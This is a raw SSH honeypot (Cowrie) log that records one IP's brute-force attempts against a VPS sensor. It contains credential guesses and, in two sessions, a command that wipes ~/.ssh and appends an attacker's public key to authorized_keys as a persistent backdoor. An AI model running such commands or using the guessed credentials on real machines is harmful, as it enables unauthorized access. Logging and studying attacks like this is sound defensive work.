{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:29:41.635260Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.login.success","username":"root","password":"fuckyou","message":"login attempt [root/fuckyou] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:29:42.981027Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:29:43.648668Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:29:43.649352Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:29:43.650435Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:43.978774Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:29:44.747172Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:29:44.747946Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:29:45.076092Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:45.077101Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39648,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6881c2c346e","protocol":"ssh","message":"New connection: 212.227.235.229:39648 (1.2.3.4:22) [session: b6881c2c346e]","sensor":"my-vps","timestamp":"2025-09-08T22:29:45.405094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:29:45.406046Z","src_ip":"212.227.235.229","session":"b6881c2c346e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:29:45.735464Z","src_ip":"212.227.235.229","session":"b6881c2c346e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:29:47.087884Z","src_ip":"212.227.235.229","session":"b6881c2c346e"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:48.416491Z","src_ip":"212.227.235.229","session":"b6881c2c346e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34544,"dst_ip":"1.2.3.4","dst_port":22,"session":"00fce669f5a4","protocol":"ssh","message":"New connection: 212.227.235.229:34544 (1.2.3.4:22) [session: 00fce669f5a4]","sensor":"my-vps","timestamp":"2025-09-08T22:29:48.745645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:29:48.746327Z","src_ip":"212.227.235.229","session":"00fce669f5a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:29:49.076406Z","src_ip":"212.227.235.229","session":"00fce669f5a4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:29:50.432543Z","src_ip":"212.227.235.229","session":"00fce669f5a4"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:50.760623Z","src_ip":"212.227.235.229","session":"335edafd3f61"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:50.762764Z","src_ip":"212.227.235.229","session":"00fce669f5a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37256,"dst_ip":"1.2.3.4","dst_port":22,"session":"29304cf60d5f","protocol":"ssh","message":"New connection: 212.227.235.229:37256 (1.2.3.4:22) [session: 29304cf60d5f]","sensor":"my-vps","timestamp":"2025-09-08T22:29:56.847680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:29:56.848435Z","src_ip":"212.227.235.229","session":"29304cf60d5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:29:57.163321Z","src_ip":"212.227.235.229","session":"29304cf60d5f"}
{"eventid":"cowrie.login.failed","username":"sgp","password":"sgp@123","message":"login attempt [sgp/sgp@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:29:58.462564Z","src_ip":"212.227.235.229","session":"29304cf60d5f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:29:59.779205Z","src_ip":"212.227.235.229","session":"29304cf60d5f"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/cf892f12e3b533c2d592378726522e385cd5313b4f14e57aebf5506c1c9be986","shasum":"cf892f12e3b533c2d592378726522e385cd5313b4f14e57aebf5506c1c9be986","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/cf892f12e3b533c2d592378726522e385cd5313b4f14e57aebf5506c1c9be986","sensor":"my-vps","timestamp":"2025-09-08T22:30:02.723741Z","src_ip":"212.227.235.229","session":"51daf6be112f"}
{"eventid":"cowrie.session.closed","duration":"301.4","message":"Connection lost after 301.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:02.724468Z","src_ip":"212.227.235.229","session":"51daf6be112f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41322,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ed97b7f2268","protocol":"ssh","message":"New connection: 212.227.235.229:41322 (1.2.3.4:22) [session: 0ed97b7f2268]","sensor":"my-vps","timestamp":"2025-09-08T22:30:17.140960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:30:17.141866Z","src_ip":"212.227.235.229","session":"0ed97b7f2268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:30:17.452165Z","src_ip":"212.227.235.229","session":"0ed97b7f2268"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe@2025","message":"login attempt [frappe/frappe@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:30:18.732947Z","src_ip":"212.227.235.229","session":"0ed97b7f2268"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:20.044466Z","src_ip":"212.227.235.229","session":"0ed97b7f2268"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38402,"dst_ip":"1.2.3.4","dst_port":22,"session":"4de773f7c9cc","protocol":"ssh","message":"New connection: 212.227.235.229:38402 (1.2.3.4:22) [session: 4de773f7c9cc]","sensor":"my-vps","timestamp":"2025-09-08T22:30:37.815735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:30:37.816676Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:30:38.144462Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.login.success","username":"root","password":"root@2024","message":"login attempt [root/root@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:30:39.501718Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:30:40.178526Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:30:40.179466Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:30:40.180972Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:40.510047Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:30:41.287971Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:30:41.288751Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:30:41.617971Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:41.618934Z","src_ip":"212.227.235.229","session":"4de773f7c9cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38410,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffc4cccd1378","protocol":"ssh","message":"New connection: 212.227.235.229:38410 (1.2.3.4:22) [session: ffc4cccd1378]","sensor":"my-vps","timestamp":"2025-09-08T22:30:41.948313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:30:41.949044Z","src_ip":"212.227.235.229","session":"ffc4cccd1378"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:30:42.279180Z","src_ip":"212.227.235.229","session":"ffc4cccd1378"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:30:43.636857Z","src_ip":"212.227.235.229","session":"ffc4cccd1378"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:30:44.967130Z","src_ip":"212.227.235.229","session":"ffc4cccd1378"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56776,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bad50be6b24","protocol":"ssh","message":"New connection: 212.227.235.229:56776 (1.2.3.4:22) [session: 8bad50be6b24]","sensor":"my-vps","timestamp":"2025-09-08T22:30:45.304432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:30:45.305453Z","src_ip":"212.227.235.229","session":"8bad50be6b24"}
